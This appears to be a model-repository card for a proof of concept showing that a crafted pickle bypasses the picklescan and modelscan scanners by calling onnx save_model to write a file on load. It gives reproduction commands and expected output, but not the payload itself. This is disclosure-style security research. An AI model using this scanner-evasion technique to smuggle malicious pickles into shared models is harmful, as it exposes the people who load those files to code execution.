YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
ONNX save_model pickle scanner bypass PoC
This repository contains a minimal malicious pickle that bypasses both picklescan==1.0.4 and modelscan==0.8.8, then writes an attacker-controlled ONNX ModelProto during normal pickle.load().
The pickle uses raw STACK_GLOBAL opcodes for:
onnx save_model
It does not use builtins.getattr, os, subprocess, eval, or any global currently blocked by picklescan 1.0.4.
Reproduce
python3 -m venv /tmp/onnx-save-model-scanner-bypass-venv
/tmp/onnx-save-model-scanner-bypass-venv/bin/python -m pip install --upgrade pip
/tmp/onnx-save-model-scanner-bypass-venv/bin/python -m pip install -r requirements.txt
/tmp/onnx-save-model-scanner-bypass-venv/bin/python reproduce_onnx_save_model_scanner_bypass.py
Expected output:
picklescan_clean=True
modelscan_clean=True
load_success=True
marker_exists=True
producer_matches=True
REPRO_OK
The marker file is written to:
/tmp/mfv_onnx_save_model_scanner_bypass_20260624.onnx
Parsing the written file with onnx.load_model() returns:
producer_name = MFV_ONNX_SAVE_MODEL_SCANNER_BYPASS_20260624
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support